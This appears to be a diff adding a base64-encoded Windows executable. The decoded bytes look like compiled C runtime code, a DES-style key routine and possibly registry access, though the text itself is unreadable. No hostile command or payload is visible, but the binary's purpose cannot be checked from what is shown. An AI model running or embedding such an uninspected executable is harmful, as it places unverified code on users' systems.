+zMzMVlcz/4t0JAwzwIoEN0dQaNDwQADohxgAAIPECIP/EHznX17DzMzMzMzMzMzMzMzMVmo6i3Qk
+DFbo0xgAAIPECIXAdBPGAF9qOkBQ6MAYAACDxAiFwHXtagpW6LEYAACDxAiFwHQTxgBfagpAUOie
+GAAAg8QIhcB17WoNVuiPGAAAg8QIhcB0E8YAX2oNQFDofBgAAIPECIXAde1ew8zMzIPsQI1EJARW
+jUwkIFeLfCRMUMdEJBAAAAAAagBRagBoLPJAAFfo5u7//4PEGIXAdCdQ6Hn4//+DxARQaNTxQABo
+EPZAAOh2FgAAg8QMuP////9fXoPEQMOLRCQMUOj+CgAAg8QEi/CF9nUdaKDxQABoEPZAAOhGFgAA
+g8QIuP////9fXoPEQMONRCQMjUwkJFBWUWoAaCzyQABX6HDu//+DxBiFwHQwUOgD+P//g8QEUGhc
+8UAAaBD2QADoABYAAIPEDFbopwcAAIPEBLj/////X16DxEDDi3wkUI1EJCCNTCQ4V41UJCBQjUQk
+MFGNTCQgUo1UJBhQjUQkJFGNTCQwUotUJChQUVJW6FH5//+DxCyFwHQkV2g48UAAaBD2QADomhUA
+AIPEDFboQQcAAIPEBDPAX16DxEDDi0QkGFDoTP7//4tEJBSDxARQ6D/+//+LRCQMg8QEUOgy/v//
+i0QkGIPEBFDoJf7//4tEJByDxARXUGgw8UAA6IIWAACDxAyDfCQcAHQag3wkHP91B2gM8UAA6xGN
+RCQoUOjA/f//6wpo6PBAAOhUFgAAg8QEaOTwQADoRxYAAIPEBIN8JCAAdBqDfCQg/3UHaAzxQADr
+EY1EJDhQ6IX9///rCmjo8EAA6BkWAACDxARo5PBAAOgMFgAAi0QkFIPEBIA4AHQOUGjg8EAA6PUV
+AACDxAiLRCQQgDgAdBaLRCQIgDgAdA1o3PBAAOjWFQAAg8QEi0QkCIA4AHQOUGjg8EAA6L8VAACD
+xAho5PBAAOiyFQAAi0QkGIPEBIA4AHQOUGjg8EAA6JsVAACDxAho2PBAAOiOFQAAi0QkHIPEBFDo
+8QUAAItEJAyDxARQ6OQFAACLRCQYg8QEUOjXBQAAg8QEVujOBQAAg8QEM8BfXoPEQMPMzMyB7JAA
+AABTVou0JJwAAABXVTP/u4AAAACNRCQYjUwkFI1UJCBQiVwkGGoAagBqAFFSV1bomOr//4PEIIvo
+he11VkeNRCQQjUwkIFBqAWoAUVboiuf//4PEFIvohe11RY1EJCBqEGoAUOhjGAAAg8QMhcB0ElCL
+RCQUUOjR/P//g8QIhcB1T4tEJBBQ6BDq//+DxASF7XSBM8BdX15bgcSQAAAAw1XoVvX//4PEBFCN
+RCQkUGgw8kAAaBD2QADoThMAAIPEELj/////XV9eW4HEkAAAAMOLRCQQUOjB6f//g8QEuP////9d
+X15bgcSQAAAAw8zMzMzMzMzMzMzMzMzMg+wIx0QkAAIAAIBo7PJAAGgQ9kAA6PYSAACDxAiDfCQM
+AnQcaMjyQABoEPZAAOjdEgAAg8QIav/o4xcAAIPEBI1EJACLTCQQUItRBFLo3uz//4PECIXAdBhQ
+aLDyQADo7BMAAIPECGoB6LIXAACDxASNRCQEi0wkAFBqCWoAaJTyQABR6Ffm//+DxBSFwHQYUGh4
+8kAA6LUTAACDxAhqAeh7FwAAg8QEi0QkBFDoTv7//4tEJAiDxARQ6OHo//+LRCQEg8QEUOhU7v//
+g8QEM8CDxAjDzMzMzMzMzMzMzMxTM8CLVCQIjQwCM9tAihmD+AiKmwDQQACIGXLrW8PMzFa6IPNA
+AItEJAhXuQQAAACL8ov486Z0EIPCCIH6oPNAAHLoM8BfXsO4AQAAAF9ew4PsBIM9GPNAAABTVldV
+i3wkGHQ0V+iWAgAAg8QEhcB1Dbj/////XV9eW4PEBMNX6Jz///+DxASFwHQNuP7///9dX15bg8QE
+w4tEJByNdwEzyTPSig6KF8HhCEYLykYz0opW/0bB4hALyjPSilb/RsHiGDPbih4LysHjCDPSilb/
+RgvTM9uKHsHjEAvTM9uKXgHB4xgL04vywe4EM/GB5g8PDw8zzsHmBDPWi/HB5hIz8YHmAADMzIv+
+we8SM/6L8sHmEjPPM/KB5gAAzMyL/sHvEjP+M9eL8sHuATPxgeZVVVVVM84D9jPWi/HB7ggz8oHm
+/wD/ADPWweYIM86L8sHuATPxgeZVVVVVM84D9jPWi/GB5g8AAPCL+sHuBIHnAAD/AMHvEAv3i/qB
+5/8AAACB4gD/AADB5xCB4f///w8L97+g80AAC/KL0YM/AHQUweoCweEaC9GLyovWweoCweYa6xLB
+6gHB4RsL0YvKi9bB6gHB5hsL1oHh////D4vyi9mB5v///w+B4wAAEADB6xKL0YHiAADAAIvpweoT
+geXAAAAAC9qJdCQQgWQkEIABAACL0YHiAAAADsHqFAvai9GB4gAeAACLmwDUQADB6gEL1YvpweoE
+geUA4AEAC5oA0kAAi9GB4gAADADB6gEL1YvuweoLgeUAAOABwe0TC5oA00AAi9GD4j8LHJUA0UAA
+i9aB4gAAAAzB6hQL1YvugeUAPAAAi5IA2EAAwe0BC2wkEMHtBQuVANZAAIvugeUAgB8Awe0NC5UA
+10AAi+6D5T8LFK0A1UAAi+rB5RCJXCQQwesQg8AEgeIAAP//g8AEC9qDxwTByxqBZCQQ//8AAAts
+JBDBzR6JaPiB/+DzQACJWPwPgrD+//8zwF1fXluDxATDzMzMzMzMzMzMzMzMzMxTM8mLRCQIihQI
+M9uK2jiTANBAAHUNQYP5CHLruAEAAABbwzPAW8PMzMzMzMzMzMyLRCQEg+wIM8lTjVABM9uKGEIz
+wIpK/8HhCIoCweAQC8sLyEIzwEKKQv9CweAYC8gzwEKJTCQEM8mKQv/B4AiKSv4LyDPAigLB4BAL
+yDPAikIBi1QkHMHgGFILyItEJByJTCQMUI1MJAxR6NHq//+LTCQQi1QkIIPEDEJCi8HB6BBCiEr9
+iGr+QsHpGIhC/ohK/4tMJAiICkJCi8HB6BBbiGr/wekYiAKISgGDxAjDzItEJASFwHQPUGoAoewO
+QQBQ/xUgIUEAw8zMzMzMzMzMVmobxwEE4UAAi/HoIBYAAIPEBItGBIXAdAlQ6MD///+DxARqG+h2
+FgAAg8QEXsPMVovx6Mj////2RCQIAXQJVujbBwAAg8QEi8ZewgQAzMyD7CC5CAAAAFZXvgjhQACN
+fCQI86WLRCQsi0wkMI1UJByJRCQgi0QkGFKLVCQMUIlMJCyLTCQUUVL/FSQhQQBfXoPEIMIIAMzM
+zMzMzMzMzFboigAAAItMJAgz9okIuFj0QAA5CHQig8AIRj3A9UAAcvGD+RNyIoP5JHcd6E8AAABe
+xwANAAAAw+hCAAAAiwz1XPRAAF6JCMOB+bwAAAByFYH5ygAAAHcN6CIAAABexwAIAAAAw+gVAAAA
+XscAFgAAAMPMzMzMzMzMzMzMzMzM6JsXAACDwAjDzMzMzMzMzOiLFwAAg8AMw8zMzMzMzMxWV4t0
+JBhW6HQVAACLRCQYi0wkFItUJBCDxARWUFFS6BwAAACDxBCL+FbowRUAAIPEBIvHX17DzMzMzMzM
+zMzMi0wkBIPsDItEJBhTiUwkBFYPr0QkHIlEJAxXVYXAi+h1CjPAXV9eW4PEDMOLXCQs90MMDAEA
+AHQJi0MYiUQkGOsIx0QkGAAQAACDfCQUAA+EoQAAAPdDDAwBAAB0MotDBIXAdCs76IvVcgKL0IvK
+i8LB6QKLfCQQizMr6vOli8iD4QPzpClTBAETAVQkEOteOWwkGHc4g3wkGACLzXQMi82LxSvS93Qk
+GCvKUYtDEItMJBRRUOj2FwAAg8QMhcB0QYP4/3RUK+gBRCQQ6yBT6NwWAACDxASD+P90VotMJBBN
+/0QkEIgBi0MYiUQkGIXtD4Vf////i0QkKF1fXluDxAzDi0QkFCvSg0sMECvF93QkJF1fXluDxAzD
+i0QkFCvSg0sMICvF93QkJF1fXluDxAzDi0QkFCvSK8X3dCQkXV9eW4PEDMPMzMzMzMzMzMzMoYT5
+QACLTCQEUFHoEAAAAIPECMPMzMzMzMzMzMzMzMxWV4t0JAyD/uB2BTPAX17DhfZ1Bb4BAAAAi3wk
+EFboHQAAAIPEBIXAdROF/3QPVui8GQAAg8QEhcB14jPAX17Di0QkBIsN7A5BAFBqAFH/FSghQQDD
+zMzMzMzMzMzMzMxVi0QkDIvsg8AMg+wEiUX8U2SLHQAAAACLA2SjAAAAAItFCItdDItj/Itt/P/g
+W4vlXcIIAMzMzMzMzMzMzMzMWFmHBCT/4MzMzMzMzMzMzFhZhwQk/+DMzMzMzMzMzMxYWYcEJP/g
+zMzMzMzMzMzMVYvsg+wIU1ZXZKEAAAAAiUX4x0X8bEFAAGoAi0UMUItF/FCLRQhQ6BR/AACLRQyD
+YAT9ZKEAAAAAi134iQNkiR0AAAAA6QAAAABfXlvJwggAzMzMzMzMzMzMzMzMzMzMVYvsg+wIU1ZX
+/IlF+GoAi0X4agCLTRRqAItVEFBRUotFDFCLTQhR6NQYAACDxCCJRfxfXluLRfyL5V3DzMzMzItE
+JAiLTCQEg+wUiUQkCIlMJAzHRCQAAAAAAMdEJARQQkAAi0QkJECJRCQQZKEAAAAAiUQkAI1EJABk
+owAAAACLRCQoUFGLTCQoUejgIgAAi8iLRCQAZKMAAAAAi8GDxBTDzMzMzMzMzMzMzMzMzMz8i0wk
+CGoAUYtBEFCLUQiLRCQYUmoAi0kMi1QkGFBRUugrGAAAg8Qgw8zMzMzMzMxVi+yD7DRTVlfHRdgA
+AAAAx0XcYENAAItFGIlF4ItFDIlF5ItFHIlF6ItFIIlF7MdF8AAAAADHRfQAAAAAx0X4AAAAAMdF
+/AAAAADHRfAZQ0AAiWX0iW34ZKEAAAAAiUXYjUXYZKMAAAAAx0XMAQAAAItFCIlF0ItFEIlF1I1F
+0FCLRQiLAFDoNBMAAP9QaIPECMdFzAAAAACDffwAD4QaAAAAZIsdAAAAAIsDi13YiQNkiR0AAAAA
+6QkAAACLRdhkowAAAACLRczpAAAAAF9eW8nDzMzMzMzMzMzMzMzMzFWL7FNW/It1CPZGBGZ0E4tF
+DF5bXcdAJAEAAAC4AQAAAMNqAYtFDItIFItQEFFSi0gIi1UQUWoAUotIDFFW6P0WAACDxCCLTQyD
+eSQAdQdWUeiK/f//i10Mi2Mci2sg/2MYuAEAAABeW13DzFWL7FNWV1VqAGoAaORDQAD/dQjonHwA
+AF1fXluL5V3Di0wkBPdBBAYAAAC4AQAAAHQPi0QkCItUJBCJArgDAAAAw1NWV4tEJBBQav5o7ENA
+AGT/NQAAAABkiSUAAAAAi0QkIItYCItwDIP+/3QuO3QkJHQojTR2iwyziUwkCIlIDIN8swQAdRJo
+AQEAAItEswjoQAAAAP9Uswjrw2SPBQAAAACDxAxfXlvDM8Bkiw0AAAAAgXkE7ENAAHUQi1EMi1IM
+OVEIdQW4AQAAAMNTUbvA9UAA6wpTUbvA9UAAi00IiUsIiUMEiWsMWVvCBADMzMzMzMxWV4t8JAxX
+6HQPAACLRCQYi0wkFIPEBFBRV+ghAAAAg8QMi/BX6MYPAACDxASLxl9ew8zMzMzMzMzMzMzMzMzM
+U1aLdCQMV4tGDKiDdHiLfCQYhf90CoP/AXQFg/8CdWaD4O+D/wGJRgx1E1Yz/+jNIgAAi1wkGIPE
+BAPY6wSLXCQUVuhoIQAAg8QEi0YMqIB0CIPg/IlGDOsUqAF0EKgIdAz2xAR1B8dGGAACAABXi0YQ
+U1Do5x8AAIPEDECD+AFfG8BeW8PoFfn//1/HABYAAAC4/////15bw8zMzMzMzItEJARQ6Lb3//+D
+xATDzMyD7CBTVot0JDBXVeiAEAAAi+iNfCQQM8C5CAAAAPOrigYz24rIsgHA6QNGitmKyIDhB9Li
+CFQcEITAdeOLRCQ0hcB1A4tFGIoIM9uK0b4BAAAAwOoDgOEHitoz0tPmilQcEIXWdCaAOAB0IYpI
+AUCK0TPbwOoDvgEAAACK2oDhB9PmM9KKVBwQhdZ12ovwgDgAdCuKCDPSitmA4QfA6wOK0zPbilwU
+ELoBAAAA0+KF2nUIQIA4AHXb6wTGAABAiUUYK8Zdg/gBuAAAAABfg9D/I8ZeW4PEIMPMzMzMzMzM
+zItEJARqAVDo1Pn//4PECMOLTCQMV4XJdHpWU4vZi3QkFPfGAwAAAIt8JBB1B8HpAnVv6yGKBkaI
+B0dJdCWEwHQp98YDAAAAdeuL2cHpAnVRg+MDdA2KBkaIB0eEwHQvS3Xzi0QkEFteX8P3xwMAAAB0
+EogHR0kPhIoAAAD3xwMAAAB17ovZwekCdWyIB0dLdfpbXotEJAhfw4kXg8cESXSvuv/+/n6LBgPQ
+g/D/M8KLFoPGBKkAAQGBdN6E0nQshPZ0HvfCAAD/AHQM98IAAAD/dcaJF+sYgeL//wAAiRfrDoHi
+/wAAAIkX6wQz0okXg8cEM8BJdAozwIkHg8cESXX4g+MDdYWLRCQQW15fw8zMVle//////4t0JAz2
+RgxAdAzHRgwAAAAAi8dfXsNW6H0MAACDxARW6BQAAACDxASL+Fbo2QwAAIPEBIvHX17DzFZXv///
+//+LdCQM9kYMg3RCVui5HgAAg8QEi/hW6K4iAACDxASLRhBQ6KIhAACDxASFwH0Hv//////rF4tG
+HIXAdBBQ6Df1///HRhwAAAAAg8QEx0YMAAAAAIvHX17DzFZX6LkkAACL8IX2dQUzwF9ew4tEJBRW
+i0wkFFCLVCQUUVLoiSIAAIPEEIv4Vug+DAAAg8QEi8dfXsPMzMzMzMyLRCQIakCLTCQIUFHor///
+/4PEDMPMzMzMzMzMzMzMzIM95A5BAABWV3QRahO+AQAAAOj5CgAAg8QE6wgz9v8F6A5BAItEJBSL
+TCQQi1QkDFBRUugoAAAAg8QMi/iF9nQPahPoOAsAAIPEBIvHX17Di8f/DegOQQBfXsPMzMzMzIPs
+CDPAiUQkBFNWV4t0JBhVi2wkJDvwdAw76HUIXV9eW4PECMOF9g+EzwEAAIM9CPtAAAAPhHUBAACD
+PRz7QAABdW6F7XQSi3wkIFVX6B4CAACDxAiL6OsEi3wkII1EJBRQagBViw0Y+0AAVlVXaCACAABR
+/xUwIUEAhcB0G4N8JBQAdRSAfDD/AA+F0gEAAEhdX15bg8QIw+gC9f//XccAKgAAALj/////X15b
+g8QIw41EJBSLfCQgUGoAVYsNGPtAAFZq/1doIAIAAFH/FTAhQQCL2IXbdBaDfCQUAA+FswAAAI1D
+/11fXluDxAjDg3wkFAAPhZ0AAAD/FTQhQQCD+HoPhY4AAAA73XNUjUQkFIsNHPtAAI1UJBJQagCh
+GPtAAFFSagFXagBQ/xUwIUEAhcB0SoN8JBQAdUONDAM7zXcoM9KFwH4RikwUEogMM4TJdCFCQzvC
+f++DxwI73XKsi8NdX15bg8QIw4vDXV9eW4PECMOLw11fXluDxAjD6Bz0//9dxwAqAAAAuP////9f
+XluDxAjD6AT0//9dxwAqAAAAuP////9fXluDxAjDhe0PhKsAAACLfCQgZosPZoH5/wB3H4gMMIvP
+g8cCZoM5AA+EiwAAAEA7xXLfXV9eW4PECMPot/P//13HACoAAAC4/////19eW4PECMODPQj7QAAA
+dRWLfCQgV+jxIgAAg8QEXV9eW4PECMONRCQUi3wkIFBqAGoAiw0Y+0AAagBq/1doIAIAAFH/FTAh
+QQCFwHQQg3wkFAB1CUhdX15bg8QIw+hJ8///xwAqAAAAuP////9dX15bg8QIw8zMzMzMzItMJARW
+i/GLRCQMi9CFwHQMZoM+AHQGg8YCSnX0hdJ0DmaDPgB1CCvxwf4BjUYBXsPMzMzMzMzMzMzMzMzM
+zMxTVot0JAxXVuiDCAAAg8QEVuhaIgAAi0wkGIPEBIv4jUQkGFBRVuglIwAAg8QMi9hWV+jZIgAA
+g8QIVujACAAAg8QEi8NfXlvDzMzMzMzMzIM9EB9BAABWdQzHBRAfQQAAAgAA6xODPRAfQQAUfQrH
+BRAfQQAUAAAAagShEB9BAFDomi8AAIPECKMAD0EAhcB1KccFEB9BABQAAABqBGoU6HsvAACDxAij
+AA9BAIXAdQpqGujIBgAAg8QEudD1QAAzwIsVAA9BAIPABIlMAvyDwSCD+FB86zP2uuD1QACLxovO
+g+Dng+EfwfgDweECi4DgDUEAjQzJiwQIg/j/dASFwHUGxwL/////g8IgRoH6QPZAAHLJXsPMzMzM
+zMzMzMzoSxoAAIA9mPhAAAB0BelNLwAAw8zMzMzMzMzMzMzMzFZXaPD1QABqAeiCBwAAg8QIaPD1
+QADoFSEAAItMJBCDxASL+I1EJBBQUWjw9UAA6NwhAACDxAyL8Gjw9UAAV+iMIQAAg8QIaPD1QABq
+AeitBwAAg8QIi8ZfXsPMzMzMzI1C/1vDLovALovALovAi8AzwIpEJAhTi9jB4AiLVCQI98IDAAAA
+dBOKCkI42XTRhMl0UffCAwAAAHXtC9hXi8PB4xBWC9iLCr///v5+i8GL9zPLA/AD+YPx/4Pw/zPP
+M8aDwgSB4QABAYF1HCUAAQGBdNMlAAEBAXUIgeYAAACAdcReX1szwMOLQvw42HQ2hMB07zjcdCeE
+5HTnwegQONh0FYTAdNw43HQGhOR01OuWXl+NQv9bw41C/l5fW8ONQv1eX1vDjUL8Xl9bw8zMzMyL
+RCQEg+wEU1ZXihhVjXgBM+2+AQAAADk1HPtAAH4RaggzwIrDUOjlLwAAg8QI6xMzyYsVYPtAAIrL
+M8BmiwRKg+AIhcB0BYofR+vLgPstdQyKH4t0JCSDzgJH6wyA+yt1A4ofR4t0JCSDfCQgAA+MugEA
+AIN8JCABD4SvAQAAg3wkICQPj6QBAACDfCQgAHUrgPswdArHRCQgCgAAAOscigc8eHQOPFh0CsdE
+JCAIAAAA6wjHRCQgEAAAAIN8JCAQdRSA+zB1D4oHPHh0BDxYdQWKXwFHR7j/////K9L3dCQgiUQk
+EIM9HPtAAAF+EWoEM8CKw1DoFS8AAIPECOsTM8mLFWD7QACKyzPAZosESoPgBIXAdAgPvsuD6TDr
+RYM9HPtAAAF+FGgDAQAAM8CKw1Do2S4AAIPECOsVM8mLFWD7QACKyzPAZosESiUDAQAAhcB0SQ++
+w1DoUi0AAIPEBI1IyTtMJCBzNIPOCDlsJBB3HHUPuP////8r0vd0JCA70XMLih+DzgRH6Vf///+K
+H0cPr2wkIAPp6Uj///9P98YIAAAAdRCLTCQchcl0BIt8JBgz7etd98YEAAAAdSP3xgEAAAB1SYvG
+g+ACdAiB/QAAAIB3DIXAdTaB/f///392LuiZ7v//98YBAAAAxwAiAAAAdAe9/////+sU98YCAAAA
+dAe9AAAAgOsFvf///3+LTCQchcl0Aok598YCAAAAdAL33YvFXV9eW4PEBMOLTCQchcl0BotEJBiJ
+ATPAXV9eW4PEBMPMzMzMzMzMzMzMi0QkDGoBi0wkDFCLVCQMUVLomv3//4PEEMPMzMzMzMyh/A5B
+AIXAdAL/0GgY8EAAaAzwQADoNgEAAIPECGgI8EAAaADwQADoJAEAAIPECMOLRCQEagBqAFDoMgAA
+AIPEDMPMzMzMzMzMzMzMzMzMzItEJARqAGoBUOgSAAAAg8QMw8zMzMzMzMzMzMzMzMzMU1ZX6LgA
+AACDPaD4QAABi3QkEHUOVv8VQCFBAFD/FTwhQQDHBZz4QAABAAAAg3wkFACLXCQYiB2Y+EAAdT+D
+PfgOQQAAdCSLPfQOQQCD7wQ5PfgOQQB3E4sHhcB0Av/Qg+8EOT34DkEAdu1oJPBAAGgc8EAA6GYA
+AACDxAhoLPBAAGgo8EAA6FQAAACDxAiF23QJ6DgAAABfXlvDxwWg+EAAAQAAAFb/FTghQQBfXlvD
+zMzMzMzMzMzMzMzMzMzMag3o6QEAAIPEBMPMzMzMzGoN6EkCAACDxATDzMzMzMxWV4t8JBCLdCQM
+O/52D4sGhcB0Av/Qg8YEO/538V9ew2ShAAAAAFWL7Gr/aCjhQABotIlAAFBkiSUAAAAAg+wQU1ZX
+iWXo/xVIIUEAM9KLyIrUgeH/AAAAwegQiRVw+EAAiQ1s+EAAo2T4QADB4QgDyokNaPhAAOgEAQAA
+6F8DAACFwHUKahDoxAAAAIPEBMdF/AAAAADodScAAOggNwAA/xVEIUEAo/AOQQDoYDIAAKOk+EAA
+hcB0CYM98A5BAAB1Cmr/6Bf+//+DxATozy8AAOjqLgAA6NX9//+hgPhAAKOE+EAAUKF4+EAAUKF0
++EAAUOjJ5f//g8QMUOjg/f//6yeLReyLAIsAiUXki0XsUItF5FDoJy0AAIPECMOLZeiLReRQ6Nf9
+//+DxATHRfz/////i0XwX2SjAAAAAF5bi+Vdw8zMzMzMzMzMzMzMzMyDPbD4QAACdAXoUjcAAItE
+JARQ6Ig3AACDxARo/wAAAP8VrPhAAIPEBMPMzMzMzMxqAGgAEAAAagD/FUwhQQCj7A5BAMPMzMzM
+zMzMzMzMzFahBPlAAFCLNVAhQQD/1osN9PhAAFH/1qHk+EAAUP/WocT4QABQ/9Zew8zMzMzMzFWL
+RCQIi+xWV408hcD4QACDPwB1RmoY6ITs//+DxASL8IX2dQpqEehU////g8QEahHoyv///4PEBIM/
+AFZ1Cv8VUCFBAIk36wjoYun//4PEBGoR6BgAAACDxASLB1D/FVghQQBfXl3DzMzMzMzMzMxVi0Qk
+CIvsiwyFwPhAAFH/FVwhQQBdw8zMzMzMzMzMzFWLRCQIi+w90PVAAHIcPTD4QAB3FS3Q9UAAwfgF
+g8AcUOhK////i+Vdw4PAIFD/FVghQQBdw8zMzMzMzMzMzMxVi0QkCIvsg/gUfQ2DwBxQ6Bv///+L
+5V3Di0UMg8AgUP8VWCFBAF3DzMzMzMzMzMxVi0QkCIvsPdD1QAByHD0w+EAAdxUt0PVAAMH4BYPA
+HFDoSv///4vlXcODwCBQ/xVcIUEAXcPMzMzMzMzMzMzMVYtEJAiL7IP4FH0Ng8AcUOgb////i+Vd
+w4tFDIPAIFD/FVwhQQBdw8zMzMzMzMzM6QsAAADMzMzMzMzMzMzMzGiwVUAA6BY4AACDxARoUFVA
+AP8VYCFBAKMQDEEAw8zMVot0JAiLBoE4Y3Nt4HUdg3gQA3UXgXgUIAWTGXUO6J04AAC4AQAAAF7C
+BACDPRAMQQAAdB2hEAxBAFDoYDgAAIPEBIXAdAtW/xUQDEEAXsIEADPAXsIEAMzMzMzMzMzMoRAM
+QQBQ/xVgIUEAw8zMzFbouv3///8VbCFBAKOA+UAAg/j/dQQzwF7DanRqAejtJQAAg8QIi/CF9nQw
+VqGA+UAAUP8VaCFBAIXAdB9W6B0AAACDxAT/FWQhQQCJBrgBAAAAx0YE/////17DM8Bew4tEJATH
+QFBw/UAAx0AUAQAAAMPMzMzMzMzMzMzMzMzMVlf/FTQhQQCL8KGA+UAAUP8VdCFBAIv4hf91R2p0
+agHoayUAAIPECIv4hf90K1ehgPlAAFD/FWghQQCFwHQaV+ib////g8QE/xVkIUEAiQfHRwT/////
+6wpqEOiQ/P//g8QEVv8VcCFBAIvHX17DzFaLdCQIi0YMqIMPhN4AAACoQA+F1gAAAKgCdA2DyCCJ
+Rgy4/////17Dg8gBiUYMqQwBAAB1C1boJDgAAIPEBOsFi0YIiQaLRhiLTghQi1YQUVLoqQAAAIPE
+DIlGBIXAdHGD+P90bItWDPbCgnU4i04QuDj7QACD+f90GYvBg+EfweECg+DnwfgDjQzJi4DgDUEA
+A8GKQAQkgjyCdQmBygAgAACJVgyBfhgAAgAAdROLRgyoCHQM9sQEdQfHRhgAEAAA/04Eiw6NQQGJ
+BjPAigFew4P4ARvAg+Dwg8AgCUYMuP/////HRgQAAAAAXsO4/////17DzMzMzMzMzMzMzMxWV4t0
+JAw7NeAOQQBzTIvGi86D4OeD4R/B+APB4QKLkOANQQCNBMn2RAIEAXQsVuhcOgAAi0QkGItMJBSD
+xARQUVboOQAAAIPEDIv4VuiuOgAAg8QEi8dfXsPokeb//8cACQAAAOiW5v//X8cAAAAAALj/////
+XsPMzMzMzMzMzItUJAiD7BCLTCQcU1aFycdEJAwAAAAAV1UPhAcCAACLRCQkg+DnwfgDjajgDUEA
+i0QkJIPgH8HgAo0cwItFAAPD9kAEAg+F2wEAAPZABEh0G4pABTwKdBSIAkJJi0UAx0QkFAEAAADG
+RBgFCo1EJBhqAFBRUotNAIsUGVL/FXghQQCFwHVR/xU0IUEAg/gFi/B1H+jY5f//xwAJAAAA6N3l
+//9diTC4/////19eW4PEEMOD/m11CjPAXV9eW4PEEMNW6Cnl//+DxAS4/////11fXluDxBDDi0Qk
+GItNAAFEJBSNRBkEigj2wYAPhCkBAACDfCQYAHQOi1QkKIA6CnUFgMkE6wOA4fuLfCQoiAiL94tE
+JBQDx4lEJBw7+A+D7wAAAIoGPBoPhNIAAAA8DXQIRogH6bkAAACLTCQcSTvOdhyNTgGAOQp1C4PG
+AsYHCumdAAAAi/GIB+mUAAAARmoAjUQkHI1MJBdQi1UAx0QkHAAAAABqAYsEGlFQ/xV4IUEAhcB1
+Cv8VNCFBAIlEJBSDfCQUAHVYg3wkGAB0UYtFAPZEGARIdB2AfCQTCnUFxgcK6z7GBw1HikQkE4tN
+AIhEGQXrLjl8JCh1DIB8JBMKdQXGBwrrG4tEJCRqAWr/UOjLCwAAg8QMgHwkEwp0BMYHDUc5dCQc
+D4cm////6xOLRQCNRBgEigj2wUB1BYDJAogIK3wkKIl8JBSLRCQUXV9eW4PEEMMzwF1fXluDxBDD
+agnoSfn//4PEBKEUDEEAhcB0HotMJARR/9CDxASFwHQQagnomPn//4PEBLgBAAAAw2oJ6Ij5//+D
+xAQzwMPMzFaLdCQYgT4gBZMZdAXo3jMAAItMJAj2QQRmdCmDfgQAdByDfCQcAHUVi0QkFGr/i0wk
+EFZQUeilBAAAg8QQuAEAAABew4N+DAB0aoE5Y3Nt4HU6gXkUIAWTGXYxi0Eci1AIhdJ0J4tEJCRQ
+i0QkJFCLRCQkUFaLdCQki0QkIFZQi3QkJFZR/9KDxCBew4tEJCCLVCQcUFKLRCQsi1QkGFBWi3Qk
+JItEJBxWUlBR6A4AAACDxCC4AQAAAF7DzMzMzItEJAiD7BhTi0gIiUwkCFZXg/n/VXwJi0QkPDlI
+BH8F6AszAACLTCQsgTljc23gdXqDeRADdXSBeRQgBZMZdWuDeRwAdWXolfr//4N4bAAPhEMCAADo
+hvr//4tIbIlMJCzoevr//4tAcGoBi0wkMIlEJDhR6NcxAACDxAiFwHUF6KsyAACLTCQsgTljc23g
+dRqDeRADdRSBeRQgBZMZdQuDeRwAdQXohTIAAItMJCyBOWNzbeAPhZkBAACDeRADD4WPAQAAgXkU
+IAWTGQ+FggEAAI1EJCCNTCQci1QkFFCLRCRIUYtMJERSUFHokAIAAItMJDCJRCQkg8QUOUwkIA+G
+MQEAAItMJBSLRCQQOQgPjwoBAAA5SAQPjAEBAACLUBCLSAyJTCQYhckPhO8AAACLTCQsi0Eci0AM
+jWgEiwCFwA+EjwAAAItMJCyLcgSF9otZHItNAIlcJCR0ZYB+CAB0XzlxBHQyg8YIi3kEg8cIih46
+H3UaCtt0EopeATpfAXUOg8YCg8cCCtt15DP26wUb9oPe/4X2dST2AQJ0BfYCCHQai0wkJIsJ9sEB
+dAX2AgF0CvbBAnQJ9gICdQQzyesFuQEAAACFyXUgSIPFBIXAD4Vx////g8IQ/0wkGIN8JBgAD4VI
+////6zWLRCRIi0wkRItcJBBQUYtFAItMJERTUFKLVCRMUYtEJExSi0wkTFCLVCRMUVLo9AIAAIPE
+KINEJBAU/0QkHItEJBw5RCQgD4fP/v//gHwkQAB0W4tMJCxqAVHotwYAAIPECF1fXluDxBjDgHwk
+QAB1OItEJEiLTCREi1QkFFCLRCRAUYtMJEBSi1QkQFCLRCRAUYtMJEBSUFHoGAAAAIPEIF1fXluD
+xBjD6BgwAABdX15bg8QYw4PsCFNWV1XoNPj//4N4aAB0NYtEJDiLfCQ0i3QkLFCLRCQsV4tMJCxW
+i1QkLFCLRCQsUVJQ6Ebk//+DxByFwA+FigAAAOsIi3QkLIt8JDSNRCQUjUwkEItcJDBQUVNXVuh7
+AAAAg8QUi+iLRCQQOUQkFHZbOV0Af0U5XQR8QItNDMHhBANNEItB9IXAdAaAeAgAdSqLRCQ4g+kQ
+i1QkKFCLRCQoV1VqAFFWi0wkOFKLVCQ4UFFS6LUBAACDxCiDxRT/RCQQi0QkEDlEJBR3pV1fXluD
+xAjDzMzMzMzMzMzMi0QkBIPsDFOLSBCJTCQMVleLcAyLfCQgVYl0JBCJdCQUhf98RI0MtQAAAACL
+RCQYi1wkKI0UiY1sAgSD/v91BehrLwAAg+0UTjldAH0FOV0EfQWD/v91DU+LTCQUiUwkEIl0JBSF
+/33SRotEJCyLVCQwi0wkEIkwi0QkIIkKOUgMcgQ7znMF6CQvAADB5gKLRCQYXV+NDLZeA8Fbg8QM
+w2ShAAAAAFWL7Gr/aDjhQABotIlAAFCLRQhkiSUAAAAAg8AIg+wUiwiJReCJTeRTO00UVleJZeh0
+cIN95P9+C4tFEItN5DlIBH8F6MEuAADHRfwAAAAAi0UQi0AIi03ki0TIBIlF3IXAdCRoAwEAAItF
+CFCLRdxQ6BQFAADrEItF7FDoSQAAAIPEBMOLZejHRfz/////i0UQi03ki1AIiwTKiUXkO0UUdZCL
+RRQ5ReR0BehaLgAAi0Xki03gX15biQGLRfCL5WSjAAAAAF3DzMyLRCQEiwiBOWNzbeB1BeitLQAA
+M8DDzMzMzMzMzMzMzItEJBxTVoXAV1V0Got8JBhQi0QkLIt0JBhQV1bozwEAAIPEEOsIi3QkFIt8
+JBiLRCQ4VoXAdQNX6wFQ6JDg//+LbCQwi1wkJItMJCCLRQBQU1FX6Lj+//+LTCREg8QQi0UEaAAB
+AABAUYtUJDCLTCQkiUcIi0IMUFNRV1boHwAAAIPEHIXAdAdXUOjR3///XV9eW8PMzMzMzMzMzMzM
+zMxkoQAAAABVi+xq/2hI4UAAaLSJQABQZIklAAAAAIPsIFNWV4tdGIt1DIll6Ild5I1G/IlF4IsI
+iU3U6PH0//+LSGyJTdjo5vT//4tIcIlN3Ojb9P//i00IiUhs6ND0//+LTRCJSHDHRfwBAAAAi0Ug
